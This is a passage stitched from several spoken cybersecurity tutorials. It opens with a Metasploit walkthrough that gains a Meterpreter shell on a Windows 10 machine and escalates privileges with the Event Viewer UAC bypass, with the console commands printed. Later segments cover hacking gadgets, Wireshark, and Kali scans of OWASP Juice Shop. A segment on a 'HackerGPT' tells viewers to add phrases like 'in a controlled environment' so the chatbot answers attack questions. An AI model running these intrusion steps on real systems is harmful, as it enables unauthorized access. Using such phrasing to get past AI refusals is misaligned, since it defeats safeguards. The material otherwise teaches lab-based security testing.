Depending on the browser's security settings, this file may be blocked by default, but we can choose to keep it, and with the right formulation of the malicious package, even the browser's antivirus checks will not detect a good payload. We save the file and open it; Windows warns that the publisher could not be verified, and we press Run. Back on our Metasploit side, you can see it has already served the HTA from its server and is printing "delivering payload". After a few seconds the payload is delivered, the data is sent, and "Meterpreter session 1 opened" appears. To see where the session is, we write sessions -i; it shows one Meterpreter session with ID 1, so we write sessions -i 1 and we have Meterpreter access. To get a fair idea of the system, we run sysinfo, which prints the computer name, the OS, the architecture, and so on. We can run the help command to see what we can do on the system: we can take screenshots, control the webcam and start a video stream, and a lot more, and many commands that work in a normal cmd, like cat and cd, work in Meterpreter as well. If we want the system's command prompt directly, we write shell, and there we go: we are in the Downloads folder. To confirm this is the same computer, we run ipconfig, and it is indeed our victim machine at 192.168.29.179. We press exit and we are back in Meterpreter. This is how we can use Meterpreter and Metasploit to gain access to a Windows 10 machine.

Next, let's look at how to get root access on a Windows 10 system. We just obtained Meterpreter access; we can background this Meterpreter session by writing background and pressing Enter, and sessions -i shows it is still present. This kind of access is not administrative: it is the sort of backdoor you get as a standard user. To get complete access to the system, including Program Files and the Windows folders, we need root, that is, administrative, access, and for that we will use another exploit. Keep in mind the standard-access Meterpreter session is still there and we are not touching it; we are setting up a second session on the same machine. The exploit is use exploit/windows/local/bypassuac_eventvwr. Checking its options, we have to choose an exploit target and supply a session; we will use session 1, the one with standard-user Meterpreter access, so we write set session 1 and run the exploit. It runs a few commands and opens a second Meterpreter session, session 2. If I run sysinfo, you can see I am still not the SYSTEM user; in shell I still see only the user's own folders. Exiting back to Meterpreter, there is a command called getsystem, which attempts to elevate your privileges to those of the local SYSTEM account.
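The privilege escalation steps as console commands (the session number is from this demo; the module is the Event Viewer UAC bypass discussed below):

```
meterpreter > background
msf6 > use exploit/windows/local/bypassuac_eventvwr
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
msf6 exploit(windows/local/bypassuac_eventvwr) > exploit
meterpreter > getsystem
```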
That basically means being promoted to root access. So we write getsystem, and thanks to pipe impersonation we now have SYSTEM-level access: the architecture now reports x64 and we are an admin user. If I drop into shell, I can move through the Windows folders and Program Files freely; that kind of control is not possible unless you have admin access or the command prompt was run with admin permissions. This is how we can use privilege escalation to reach administrative access: we used a second exploit, the Event Viewer UAC bypass, and pointed it at our first session. As you can read in its description, "Windows Escalate UAC Protection Bypass", it was first disclosed in 2016, but it still works on some systems. And that is how we can get root access on a Windows 10 installation. Hope you learned something new today.

Today we are going to talk about some really interesting and powerful hacking gadgets you should know about in 2024. But remember, this is just for learning; we don't want anyone getting into trouble. The best way to keep your computers and devices safe is to know about the risks. Some risks are easy to manage: use strong passwords, don't download from bad websites, and don't hand your unlocked device to strangers. But there are also hidden dangers that can cause big problems, and some tools look innocent while being very dangerous. Here are seven gadgets that look normal but are actually powerful hacking tools. These tools are made for security experts to test systems, but they can be misused.

Let's kick things off with a device that's small but incredibly powerful: the Raspberry Pi. The Raspberry Pi is a compact and affordable computer that has revolutionized the tech world. Originally designed for educational purposes, it has become a favorite among hobbyists, makers, and even professionals. Despite its small size, it boasts impressive capabilities, including multiple USB ports, HDMI output, and support for various operating systems like Linux and Windows 10 IoT Core. The Raspberry Pi can be used for a wide range of projects, from simple programming and gaming to complex IoT systems and home automation. But the Raspberry Pi can also be a dangerous hacking tool. With the right software it can perform a variety of hacking tasks; for example, it can run Kali Linux, a popular operating system for penetration testing, which allows it to be used for network scanning, password cracking, and even setting up rogue access points to intercept data. Its small size makes it easy to hide, and its affordability means it is accessible to many; in the wrong hands, this innocent-looking device can become a powerful tool for malicious activities.

Now that we have seen the potential of the Raspberry Pi, which by the way is a personal favorite for tinkering, let's move on to another seemingly simple but powerful device: the Wi-Fi adapter.
A Wi-Fi adapter might seem like a simple device used to connect to wireless networks, but it can be a potent hacking tool in the wrong hands. When paired with the right software, these adapters can intercept and monitor wireless communications, making them invaluable for network analysis and penetration testing; for example, they can be used with tools like aircrack-ng to crack Wi-Fi passwords. Hackers can use Wi-Fi adapters to perform attacks such as packet sniffing and man-in-the-middle attacks, activities that can lead to unauthorized access to networks, data theft, and severe security breaches. It's like having a digital spy in your pocket. While essential for legitimate security testing, it is crucial to be aware of the potential misuse and to secure your own wireless networks against such threats.

Speaking of Wi-Fi, you won't believe how sneaky this next device is. Let's take a look at a device that takes wireless hacking to a whole new level: the Wi-Fi Pineapple. The Wi-Fi Pineapple looks like a standard router, but it is a sophisticated device used for hacking wireless networks. It allows attackers to create rogue Wi-Fi access points, tricking users into connecting and revealing their login credentials; imagine connecting to what looks like free public Wi-Fi, only to have your data intercepted. This device is capable of advanced man-in-the-middle attacks, monitoring and recording data from all connected devices. Additionally, the Wi-Fi Pineapple can capture Wi-Fi handshakes, which can then be used to crack network passwords. Its powerful features make it a favorite among penetration testers for assessing network security, but in the wrong hands it can be used for malicious activities, highlighting the importance of robust wireless security.

From Wi-Fi to Bluetooth, which is everywhere these days, right? Let's now explore a powerful tool for Bluetooth hacking: the Ubertooth One. The Ubertooth One is an open-source Bluetooth testing tool that appears to be a simple USB dongle. Despite its unassuming appearance, it can monitor and analyze Bluetooth communications, making it a valuable asset for testing the security of Bluetooth devices; think of it as a spy for Bluetooth traffic. The Ubertooth One can capture Bluetooth packets, perform Bluetooth attacks, and even explore vulnerabilities in Bluetooth networks. Its ability to dissect Bluetooth traffic makes it a powerful tool for both legitimate security research and potential misuse, and understanding its capabilities highlights the importance of securing Bluetooth-enabled devices against unauthorized access and attacks.

Continuing with radio frequency tools, which honestly sounds like something out of a spy movie, let's discuss the HackRF One and its versatile capabilities. The HackRF One is a versatile software-defined radio (SDR) platform that can transmit and receive radio signals from 1 MHz to 6 GHz. It looks like a standard electronic device but can be used for a wide range of hacking activities; imagine being able to capture and manipulate signals across a broad spectrum. With the HackRF One, users can capture and analyze various radio signals, jam frequencies, and even spoof signals to manipulate communication systems. This tool is particularly useful for exploring and testing the security of wireless communication systems. While it serves an essential role in legitimate research and development, the HackRF One also demonstrates the need for robust security measures against radio-frequency-based attacks.

Now let's look at a tool that takes advantage of a computer's trust in USB devices, and trust me, this one's sneaky: the USB Rubber Ducky. The USB Rubber Ducky is a device that looks like a regular flash drive but acts like a keyboard, typing commands into any computer it is plugged into. Hackers use it to execute pre-programmed scripts that can steal data, install malware, or take control of the target device. It's like a tiny digital ninja. This tool exploits the trust computers place in USB devices, making it a potent weapon for cyber attacks. It is a reminder to be cautious about plugging in unknown USB drives: they could be Rubber Duckies in disguise, ready to unleash harmful commands and compromise your system's security.
Finally, we have a real undercover gadget here. Let's uncover the secret capabilities of the LAN Turtle. The LAN Turtle looks like a typical USB Ethernet adapter, but it is a covert hacking tool used to monitor and infiltrate networks; don't let its innocent appearance fool you. It provides hackers with several capabilities, such as network scanning, DNS spoofing, and data capture. The LAN Turtle can be discreetly plugged into a network, allowing an attacker to gather sensitive information and gain unauthorized access. Its ability to operate undetected makes it particularly dangerous, emphasizing the need for vigilance and robust network security measures to prevent unauthorized devices from connecting to your systems. So there you have it: we have explored some of the most powerful and dangerous hacking gadgets out there. These tools can do a lot of damage if they fall into the wrong hands, which is why it is so important to stay informed and vigilant about cybersecurity.

Hey everyone, today we will explore the world of cybersecurity with HackerGPT, a specialized version of ChatGPT designed for ethical hacking and cybersecurity. In a digital landscape where cyber attacks occur every 39 seconds, causing billions in damages annually, HackerGPT provides essential tools and knowledge to defend against these threats. HackerGPT offers guidance on a wide range of topics, including security practices, ethical hacking techniques, and scripting for system security. Cybercrime damages are expected to reach $6 trillion annually, making them a major challenge for organizations. As for breaches: in 2020, over 36 billion records were exposed due to data breaches, and the infamous Equifax breach of 2017, in which 147 million people's information was compromised, highlights the importance of regular security assessments and vulnerability management. These are the areas where HackerGPT excels. HackerGPT strictly adheres to ethical guidelines, refusing to assist with any unethical or illegal queries; the commitment is to provide guidance that adheres to legal and professional standards, helping you become a responsible cybersecurity professional. So let's get started with HackerGPT and see how it can equip you with the knowledge and skills to defend against cyber threats ethically and effectively.

This is ChatGPT, the paid version, and this is the Explore GPTs section, where you can find all the GPTs created by OpenAI, by individuals, or by companies. These are the recently used ones, and this is the most-used HackerGPT; you can find other GPTs with the same HackerGPT name as well. One has been used by 5,000-plus users,
and this one by 10,000-plus users. Search for "ethical hacker GPT" here and you will see it is rated 4.5 stars with 10,000-plus conversations, along with its conversation starters, capabilities, user ratings, and more from the creator. We'll start a chat with it. I want to tell you that ChatGPT does not answer unethical questions; if you try to extract that kind of information from ChatGPT, it won't be possible, but we can go a bit further with the ethical hacker GPT, and that should be used for ethical purposes only. I will show you how to utilize this GPT. One more thing: if you want to create your own GPT, you can do that too. Go to the Explore GPTs section and click the Create option. Under Configure you can write the name of your GPT, its description, instructions, and conversation starters, just as you saw with the ethical hacker GPT, and enable whichever capabilities you want. In the Create tab you can write prompts, and it will take that information and use it; you can also attach files that help build your GPT. You can then see the configuration and a preview of your GPT and finalize it. Moving back, we return to the ethical hacker GPT and start our conversation.

The first thing we can ask is: "How can I perform a basic security assessment on a web application?" Performing a basic security assessment on a web application is crucial for identifying vulnerabilities and ensuring the application is secure, and the process involves using various tools and techniques to test the application for common security issues. We ask the question, wait a few seconds, and we have the response from the ethical hacker GPT. As you can see, performing a basic security assessment involves several key steps: number one is preparation and information gathering (identify the scope, gather information); the second step is reconnaissance, where you can use tools like Burp Suite, Nikto, and others; and similarly you can see all the remaining steps. I won't read out every response the ethical hacker GPT generates; I have used it, and it provides quite accurate results, I would say around 95 to 96 percent accurate. Here I want to show you the prompts and the kinds of things you can ask it.

That was about general security. Now we move to ethical hacking, and we can ask how to perform a SQL injection attack ethically in a test environment. The prompt would be: "How do I perform a SQL injection attack, ethically, on a test environment?"; including "ethically" and "test environment" is the right way to phrase it. SQL injection is one of the most common web application vulnerabilities, and understanding how to perform a SQL injection attack ethically in a test environment can help you identify and mitigate the risk in your own applications. You can see it has responded with the steps: set up a controlled test environment first, then preparation and the tools you can use, then manual SQL injection testing, with methods such as the classic ' OR 1=1 payload against the database, then automated SQL injection testing, with the command for that, and finally verifying the vulnerability, documentation, and reporting. So you can see this GPT is capable of answering these basic questions.
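For the automated-testing step, the transcript only alludes to "the command for that"; a typical example of that kind of automation, assuming a deliberately vulnerable test app running locally, is sqlmap:

```bash
# Probe a test URL's 'id' parameter for SQL injection, non-interactively
sqlmap -u "http://127.0.0.1/vuln.php?id=1" --batch

# If it is injectable, enumerate the available databases
sqlmap -u "http://127.0.0.1/vuln.php?id=1" --batch --dbs
```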
Now we move to scripting and automation, and we can see how it responds here. We ask: "Can you provide a Python script to scan open ports on a network?" Scanning open ports on a network is a fundamental step in identifying potential vulnerabilities, and a script that automates this process makes it easier to regularly check for open ports and secure them. It produces a Python script you can run in any IDE, and you can see it explains the code as well; you can even ask it to explain the code line by line and it will do that for you, along with telling you how to run the script.
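The generated Python script itself isn't reproduced in the transcript; as a rough bash equivalent of the same idea, using the shell's built-in /dev/tcp pseudo-device (the target host and port range are placeholders):

```bash
#!/bin/bash
# Minimal TCP port sweep sketch: attempt a connection to each port with a 1s timeout.
host="192.168.29.179"            # placeholder target from the earlier demos
for port in $(seq 1 1024); do
  if timeout 1 bash -c "echo > /dev/tcp/$host/$port" 2>/dev/null; then
    echo "Port $port is open"
  fi
done
```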
Similarly, we can ask how to write a bash script to monitor and log unauthorized login attempts, and we can run that prompt too: "How do I write a bash script to monitor and log unauthorized login attempts?" Monitoring and logging unauthorized login attempts is essential for maintaining the security of your system, and as you can see, it has written a bash script that can help automate the process, providing real-time alerts and logs for further analysis. It again provides the explanation and how to run the script, and it notes that you can write follow-up prompts if you have doubts about any part of any script or response, and it will provide good answers.
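The GPT's actual script isn't quoted in the transcript either; a minimal sketch of the idea, assuming a Debian-style /var/log/auth.log (on Red Hat systems it would be /var/log/secure) and SSH-style "Failed password" log lines, might look like this:

```bash
#!/bin/bash
# Watch the auth log and record failed login attempts as they happen.
LOG_FILE="/var/log/auth.log"             # assumption: Debian/Kali location
ALERT_FILE="/var/log/failed_logins.log"

tail -Fn0 "$LOG_FILE" | while read -r line; do
  if echo "$line" | grep -q "Failed password"; then
    echo "$(date '+%F %T') ALERT: $line" >> "$ALERT_FILE"
  fi
done
```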
Next we ask the ethical hacker GPT about some specific security tools, starting with Burp Suite. The prompt could be: "Can you explain how to configure and use Burp Suite for web application testing?" To sum it up, Burp Suite is a powerful tool for web application security testing, and understanding how to configure and use it effectively can help you identify and address a wide range of security vulnerabilities in your applications. You can see it has provided the steps: downloading and installing Burp Suite, configuring your browser to use Burp Suite as a proxy, intercepting and inspecting traffic, using it for testing, logging and reporting, and tips for effective testing.

If we talk about incident response, we can ask it to write a script to collect system logs for forensic analysis. Collecting system logs is a critical part of incident response and forensic analysis, and a script can automate the process, ensuring you have all the necessary data to investigate security incidents effectively: "Can you provide a script to collect system logs for forensic analysis?" So far we have covered general cybersecurity questions, ethical hacking with the SQL injection prompt, scripting and automation with the port scanner and the login monitor, and tools with Burp Suite; here, for incident response, it has written a script to collect system logs for forensic analysis. I won't walk through this code either, since we are focusing on the prompts, but you can ask it to explain the code line by line. It has already described the directories and files to collect, how the logs are copied into the directory held in an output-directory variable, archiving the logs, cleanup, and how to run the script.

Now we move to some advanced topics, and here we can ask how to perform a man-in-the-middle attack in a controlled environment. Remember that you have to include keywords like "in a controlled environment"; only then will it provide the response. So: "How do I perform a man-in-the-middle attack in a controlled environment?" Understanding how a man-in-the-middle attack works in a controlled environment can help you develop better defenses against such attacks, and it is important to learn and practice these techniques ethically. You can see it provides the prerequisites and a step-by-step guide: first set up the controlled environment, then install the necessary tools, enable IP forwarding, perform ARP spoofing, capture and analyze traffic, and finally clean up and restore the network, followed by a conclusion. You can follow up with more prompts, such as "I want more information about setting up the controlled environment", and the ethical hacker GPT will expand on how to set it up.

Moving on, we can ask about reverse engineering ("Can you explain the process of reverse engineering a malware sample?"), about honeypots ("How can I implement a honeypot to detect malicious activity?"), or about hardening ("What are the techniques for securing a Docker container?"). Let's run the honeypot prompt and see the response. A honeypot is a security mechanism set up to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems, and implementing one can help you monitor and understand attack patterns. It gives a step-by-step guide: choose the type of honeypot, prepare your environment, install and configure the honeypot software, with the commands for configuring it, then monitor and analyze the honeypot, and perform regular maintenance and updates, ending with a simple honeypot you can install and run with the listed commands.

Finally, we will also cover cybersecurity policies and compliance, because it can answer those prompts too. You can ask what should be included in a company's cybersecurity policy, mentioning what type of company you are running. As you can see, creating a comprehensive security policy for a company involves covering various aspects: an introduction with the purpose of the cybersecurity policy, scope, roles and responsibilities, data protection and privacy, network security, application security, user security awareness and training, incident response and management, compliance and legal requirements, physical security, and device and endpoint security. Similarly, you can ask it to draft the company's cybersecurity policy starting with the introduction, and it will provide the introduction points; then ask it to draft roles and responsibilities, and it will draft those too. Since a single response has length limits, you can break the task into parts and ask the ethical hacker GPT piece by piece, and it will respond.

Do you know, friends, that Wireshark is a powerful network protocol analyzer that helps you capture and analyze network traffic in real time? It allows you to dive deep into the data packets traveling through your network, giving you insights into network performance, security, and troubleshooting. In this tutorial we will guide you through the basics of using Wireshark, from setting up your capture environment to interpreting the data; by the end, you will have a solid understanding of how to navigate the Wireshark interface, set up filters, and analyze network traffic for different use cases. So let's get started.

Let us start by understanding what Wireshark is. Wireshark is a comprehensive, open-source network protocol analyzer that allows users to capture and analyze the data traveling over a network in real time. It is widely used by network administrators, security professionals, and developers for various purposes. For example: network troubleshooting, where you identify and resolve network issues by examining traffic patterns and diagnosing connectivity problems; network analysis, which we will also do in our hands-on, where you understand and optimize network performance by analyzing data flows and the interaction between network systems; security auditing, where you detect and investigate unusual or potentially malicious network activity such as unauthorized access or data breaches; and protocol development, where you debug and develop network protocols by capturing and analyzing protocol messages and behaviors.

Now for the key features of Wireshark. The first is packet capture: Wireshark captures packets of data transmitted over the network, and each packet contains a wealth of information, including source and destination addresses, protocol types, and payload data. As you can see, I have already downloaded Wireshark (I will also guide you through downloading it), and these lines, the Wi-Fi packet graph, show how packets are being transmitted; this is the real-time analysis you get in Wireshark.
Wireshark decodes and displays data at various protocol layers (for example Ethernet, IP, TCP, and HTTP), which allows for detailed examination of network communications. You can also perform filtering and searching, and you get data visualization, which includes features for visualizing network traffic such as flow graphs (as you can see here) and statistics, which help in understanding network behavior and performance. Wireshark is available for multiple operating systems, including Windows, macOS, and Linux.

There are certain scenarios where network security engineers use it: network performance monitoring, where you track and analyze the performance of network applications and services; incident response, where you investigate and respond to network security incidents by analyzing captured traffic; and protocol analysis, where you examine and troubleshoot network protocols and ensure proper implementation.

Now let us start with Wireshark. First, let us download it: go to wireshark.org/download.html. Since I am using Windows, I clicked on the Windows x64 installer, and as you can see, it starts downloading. Since I have already downloaded it, I do not have to do it again; the steps are very simple, just click through the prompts, the installer pulls in all the required dependencies, and after the final OK you arrive at the entry screen of the Wireshark Network Analyzer.

Here you can capture network packets from the listed interfaces: local area connection, the adapter-for-loopback traffic capture, Bluetooth, and the Ethernet interfaces. Let us choose Wi-Fi as the network interface and click on it. As you can see, many packets start streaming in (the shark-fin icon starts the real-time packet capture).

Now let us look at what is in the Wireshark menus. File is for managing files: open, save, export (including TLS session keys and objects), print, and quit. In Edit you can modify preferences, settings, and profiles. In View you can adjust the layout of Wireshark. With Go you can navigate through the packets. Under Capture you can start, stop, or restart a capture. Next is Analyze, where you have display filters, display filter macros, display filter expressions, and more. Similarly, Statistics helps in viewing network statistics and data summaries; Telephony covers telephony protocols; then there is Wireless; Tools, which includes firewall ACL rules and MAC address utilities; and finally Help. That is a basic overview of the application.

Now let us do some basic exercises. First, let us capture some traffic: since I have already selected Wi-Fi as our network interface, let us restart the capture from the Capture menu.
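If you prefer the command line, Wireshark ships with tshark, a terminal capture tool that mirrors what we just did in the GUI. A minimal sketch follows; the interface name "Wi-Fi" and the packet count are assumptions for this Windows demo (use `tshark -D` to find your real interface name or index):

```bash
# List available capture interfaces (equivalent to the GUI's welcome screen)
tshark -D

# Capture 50 packets on the Wi-Fi interface and save them to a file
tshark -i Wi-Fi -c 50 -w capture.pcapng

# Re-read the capture, showing only HTTP traffic (a display filter, as in the GUI)
tshark -r capture.pcapng -Y "http"
```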
With the capture running again, go to your browser and request a simple test site over HTTP; here we use httpbin.org. That is the basic website we requested in the browser, so let us go back to Wireshark and stop the capture for a moment. The bar at the top is where you apply a display filter: type http there, and the filtering is done. As you can see, each row now shows the packet number, the time, the source, the destination, the protocol, the length of the packet, and the info column.

Now let us do a general analysis of the Wireshark output, starting with the HTTP requests and responses. Here is our source sending a request to the destination address 44.219.81.240; the protocol is HTTP, the length of the packet is 480, and it is a GET request: GET / HTTP/1.1. Then there is a reply from that destination back to our source; the protocol is still HTTP, the packet length has increased to 887, and the status is 200 OK. What we are getting back is an HTML file. Similarly, we request again and receive a JSON file: a GET for a specific JSON resource over HTTP/1.1, followed by its reply. So it is a to-and-fro exchange: our device sends requests to the destination over HTTP, and the destination replies. You can also see the content types: text/html for the HTML structure, and a JSON type for the JSON resource. That is the request we made to httpbin.org, and it returned a text/html file. I hope this gives you a good idea of how to do a general analysis of Wireshark output.

Now let us try one more example to make the concepts clearer: diagnosing network issues with the ping and tracert commands, which can also be done with the help of Wireshark. Open a terminal, and let us generate some ICMP traffic using the ping command: type ping google.com, and you can see the requests and replies start. Next we will use the tracert command to trace the packet flow; we will discuss its output a bit later. Now open Wireshark, stop the capture, go to the filter bar, type icmp, and apply it. You can see that one destination shows as unreachable while the others get replies. Let us examine this protocol, but first let us understand what we did in the terminal.
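To reproduce the traffic we just analyzed, you can generate both the HTTP and the ICMP packets from a terminal while Wireshark is capturing. A small sketch (the httpbin.org endpoints /html and /json serve the content types seen above; ping and tracert are shown in their Windows form, as in this demo):

```bash
# Generate the HTTP traffic analyzed above (display filter: http)
curl http://httpbin.org/html   # returns a text/html body
curl http://httpbin.org/json   # returns a JSON body

# Generate the ICMP traffic analyzed above (display filter: icmp)
ping google.com                # echo requests / echo replies (4 by default on Windows)
tracert google.com             # Windows; use traceroute on Linux/macOS
```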
When we type ping google.com, the command tests the reachability of google.com by sending Internet Control Message Protocol (ICMP) echo request packets and waiting for the replies (echo responses). Let us break down the ping results. Each reply shows the IP address 142.250.193.110, which is one of Google's servers, along with the round-trip time (latency) for each packet: roughly 76 ms for the first, 88 ms for the second, 99 ms for the third, and 30 ms for the fourth. There is also a field called time to live (TTL), here 55 for each packet; note that TTL is not a duration but a hop count, indicating how many hops (routers) the packet can pass through before being discarded. If a reply were not received within the allotted time, you would instead see a "Request timed out" entry for that packet. Finally, the ping statistics summarize the run: four packets sent, four received, and no loss, with approximate round-trip times of 30 ms minimum, 99 ms maximum, and 73 ms average.

Now look at the tracert command. Run with no arguments, it prints its options: -d means do not resolve IP addresses to host names, -h sets the maximum number of hops (routers) to search, and -w sets the timeout in milliseconds for each reply. If I run tracert google.com, it shows all the hops the packet travels through to reach the Google server, which helps diagnose where delays or issues might occur along the path. There are a lot of other options listed, which you can read through similarly.

Now let us do the Wireshark analysis. Our source, 10.101.5.118, sends a request to the Google server using the Internet Control Message Protocol: an echo (ping) request with ID 0x0001, a sequence number, and the time to live. Packet number 7630 is the request we send, and packet 7641 is the reply from the Google server carrying the matching ID and sequence number. You can also apply further filters here; the filter bar offers many options (see the documentation), and whenever the bar turns red it is flagging an error in the filter expression. For example, filter on our own IP address with ip.addr == 10.101.5.118; this narrows the capture to traffic for that address, which here is just our own pings, since we made no other requests. So that was the kind of analysis you can do: using Wireshark to diagnose network issues with the help of the ping and tracert commands.
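As a quick illustration of those tracert switches (the hop limit and timeout values here are arbitrary examples):

```bash
# Trace the route to google.com without reverse-DNS lookups (-d),
# searching at most 20 hops (-h) and waiting 1000 ms per reply (-w)
tracert -d -h 20 -w 1000 google.com

# Roughly equivalent on Linux/macOS (different flag names)
traceroute -n -m 20 google.com
```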
You can do a lot more with Wireshark; these tools are used by network administrators, hackers, and network engineers to understand network performance and diagnose network issues. So this was a short exercise on the basics of Wireshark; I hope you enjoyed today's video.

Imagine being able to assess the security of a system like a pro hacker, but ethically, of course. In this tutorial we are going to walk you through how to perform penetration testing using Kali Linux, one of the most powerful toolkits in the cyber security world. Whether you are a beginner or a tech enthusiast, you are going to learn the basics of pen testing with essential tools in Kali Linux and how to identify vulnerabilities in your network. By the end of this video you will have a strong foundation for starting your ethical hacking journey.

First, let us understand what exactly penetration testing is. Penetration testing, or pen testing, is a simulated cyber attack conducted by ethical hackers to evaluate the security of a system, application, or network. The goal is to uncover vulnerabilities and weak points that attackers could exploit, and to provide actionable recommendations to secure the systems. Unlike regular vulnerability assessments, penetration testing goes a step further by actively exploiting the vulnerabilities to understand their impact.

Now you might wonder why we do penetration testing. It serves several critical purposes. First, identifying weaknesses: even the most secure systems have vulnerabilities, which can stem from outdated software, misconfiguration, or human error, and penetration testing uncovers these weaknesses before they are exploited. For example, suppose you have a web application that uses an outdated version of PHP; a penetration test could reveal that this version has a known vulnerability allowing remote code execution. Second, testing incident response: a penetration test does not just highlight vulnerabilities, it also assesses how your systems and team respond to simulated attacks, helping organizations identify gaps in their incident response plans. Suppose during a test an ethical hacker deploys ransomware; the security team's speed and efficiency in detecting and containing the attack determine their readiness for a real incident. Third, meeting compliance standards: industries like healthcare, finance, and e-commerce must comply with stringent data protection regulations, and penetration testing helps meet standards such as PCI DSS, GDPR, or HIPAA. The fourth reason is protecting your reputation: a breach can damage customer trust and tarnish your brand image, and penetration testing is a proactive way to safeguard your reputation. For example, a major retail chain suffers a data breach exposing millions of customer records, and post-incident analysis reveals that a simple penetration test could have identified the vulnerability and prevented the breach.

Now let us discuss the types of penetration testing. Penetration tests can be categorized based on their scope and the level of information shared with the tester; on that basis there are three types. The first
one is black-box testing, where the tester has no prior knowledge of the system; this simulates an attack by an external hacker. In white-box testing, the tester has full access to the system, including source code, architecture details, and so on; this simulates an insider attack or a highly informed hacker. The third is gray-box testing, where the tester has partial knowledge, such as user credentials or limited architecture details, and simulates an attack based on that. You can run these kinds of penetration tests against a system to check its vulnerability.

Now let's do a hands-on penetration testing exercise with Kali Linux. If you have not installed Kali Linux, go to its official website; under the "Get Kali" tab you can install it as a virtual machine, from an installer image, or in several other ways. If you are using Windows, you can also open the Microsoft Store, search for "Kali Linux", and install the app directly, which is what I have done; the installation process is very simple. Once done, open the terminal.

On Kali Linux you have to install some additional tools to perform penetration testing, so let us set them up. With the Kali terminal open, the tools we are going to install are Nmap, whois, dig, Nikto, WPScan, OpenVAS, and Metasploit. Here is a brief idea of each, with a recon sketch after this list. Nmap stands for Network Mapper; its purpose is to scan the network to identify open ports, services, and operating systems, so you can scan a target for open ports and running services. The next tool is whois, which provides domain registration details and ownership information; for example, running whois against a demo site like example.com helps you gather domain-level information about the target. The third tool is dig, which performs DNS enumeration to retrieve DNS records such as A, MX, and NS records; this tool matters because we will need DNS records during penetration testing, and it is used to explore the DNS structure of the target domain. The fourth tool is Nikto, which scans web servers for vulnerabilities such as outdated software, default configurations, and potential misconfigurations; it also checks for other weaknesses on the web server. The fifth tool is WPScan, which scans WordPress websites for vulnerabilities in themes, plugins, and core files; it enumerates users and checks for plugin vulnerabilities. WPScan requires an API token, which can be obtained from its vulnerability database website (wpvulndb.com), so that is an additional requirement. The next tool is OpenVAS, also known as Greenbone Vulnerability Manager, which provides a comprehensive vulnerability management system.
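As a quick taste of the reconnaissance tools just described, here is a minimal sketch of domain-level information gathering (example.com stands in for a target you have permission to test):

```bash
# Domain registration and ownership details
whois example.com

# DNS enumeration: address, mail, and name-server records
dig example.com A  +short
dig example.com MX +short
dig example.com NS +short
```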
It performs scans to detect vulnerabilities across the target. Finally, we have Metasploit, which is used for exploit development and execution against identified vulnerabilities.

Before installing anything, refresh the package index with sudo apt update. After that, type sudo apt install nmap; since I have already installed Nmap I do not need to, but that is the command. Now let us check the Nmap version by typing nmap --version; you can see I have version 7.94. This is the official Nmap documentation; if you want more information about the tool, refer to it. The next tool is whois: run sudo apt update again if needed, then sudo apt install whois, and whois is installed too. Next is dig, which comes from the DNS utilities package, so install it with sudo apt install dnsutils; to check the version, type dig -v, which here reports version 9.2. Then install Nikto with the same pattern; since I have already installed Nikto I do not need to, and you can see its version here. The fifth tool is WPScan, installed the same way; after installing, register on the WPScan site and copy the generated API token, which you will find on your WPScan profile page. You can check the version with wpscan --version; I have version 3.8.27 installed. Now let us install OpenVAS: type sudo apt install openvas, and you can see the installation progress until the tool is installed. The next step is installing Metasploit: type sudo apt install metasploit-framework; since I have already installed it I do not need to, but you can run this command to download it.
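Collecting the setup steps above into one place, a minimal install-and-verify sketch on Kali (the package names are the standard Kali/Debian ones; note that OpenVAS usually needs an extra initialization step after installation that is not shown here):

```bash
# Refresh the package index, then install the pentesting toolchain
sudo apt update
sudo apt install -y nmap whois dnsutils nikto wpscan openvas metasploit-framework

# Verify the installs
nmap --version
dig -v
nikto -Version
wpscan --version
msfconsole --version
```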

Now let us check the Metasploit version: type msfconsole --version, and you can see I have version 6.4.34. We have installed all these tools and checked their versions, so let us proceed to the penetration test.

We will be using a demo website for the penetration testing: OWASP Juice Shop at juice-shop.herokuapp.com (I will mention the link), which you can use to learn how to do penetration testing. One word of advice before you pen test any other application: get written permission first. Without permission you cannot do penetration testing of any live website; the idea is to hack ethically, and unethical practices are not permissible.

Now open Kali Linux. We will run an Nmap scan on the website we just opened, juice-shop.herokuapp.com: copy the link and run nmap -sS -A against the host name, and you can see the scan start. This is going to reveal the open ports, services, and possibly the underlying technology of the web application. It might take some time, so wait a few moments. Once Nmap has finished, you can see the stats: port 80 over TCP, state open, service HTTP, and the version reported as Cowboy. So we know the open HTTP port is 80. We can also identify the web server in use: the server is the Heroku router. We now have the information we wanted; the overall idea was to look for the open ports.

Next, let us do a vulnerability assessment using Nikto: type nikto -h followed by the site URL. Here we are looking for misconfigurations, outdated server versions, or exposed directories and files. In the output you get the target host name and target port, and the SSL info is shown as well. You can see it reports that the site uses TLS but the Strict-Transport-Security header is not defined. It keeps scanning for further vulnerabilities, so give it some time. Once done, Nikto produces quite a long vulnerability assessment, so let us look through it. It notes that the server is using a wildcard certificate (click the accompanying link for a brief explanation of that), and it lists everything that could be vulnerable, including a backup certificate file it found. Scrolling down a little, you can see that the X-Content-Type-Options header is not set; Nikto explains that this could allow a user agent to render the content of the site in a different fashion, meaning a MIME-type attack could be attempted against this website. Nikto also reports a robots.txt file.
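For reference, here are the two scans above as they might be typed. The exact Nmap flags spoken in the demo are hard to make out, so -sS -A is an assumption: a SYN scan plus service/OS detection, which matches the output described. Scan only targets you have written permission for.

```bash
TARGET=juice-shop.herokuapp.com

# Port/service discovery: SYN scan (-sS, needs root) with detection (-A)
sudo nmap -sS -A "$TARGET"

# Web-server vulnerability assessment with Nikto
nikto -h "https://$TARGET"
```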
robots.txt is a plain text file located in the root directory of a website, for example juice-shop.herokuapp.com/robots.txt. Its primary purpose is to instruct web crawlers, such as search engine bots, that interact with the website. It can reveal sensitive information, which makes it significant from both a web security and an SEO perspective. You can check robots.txt manually: take the URL of the site you are pen testing and append /robots.txt. In the output you can see "User-agent: *" and "Disallow: /ftp". The User-agent directive says which crawlers the rules apply to; the asterisk is a wildcard, meaning the rule is intended for every bot that visits this website, such as Googlebot or Bingbot. What is it disallowing? The Disallow directive tells bots not to crawl the index of the /ftp directory of the website, so bots should skip /ftp and avoid listing its content in search engines. However, this does not restrict manual access: users or attackers can visit the /ftp URL directly in their browser, or use a tool like curl.

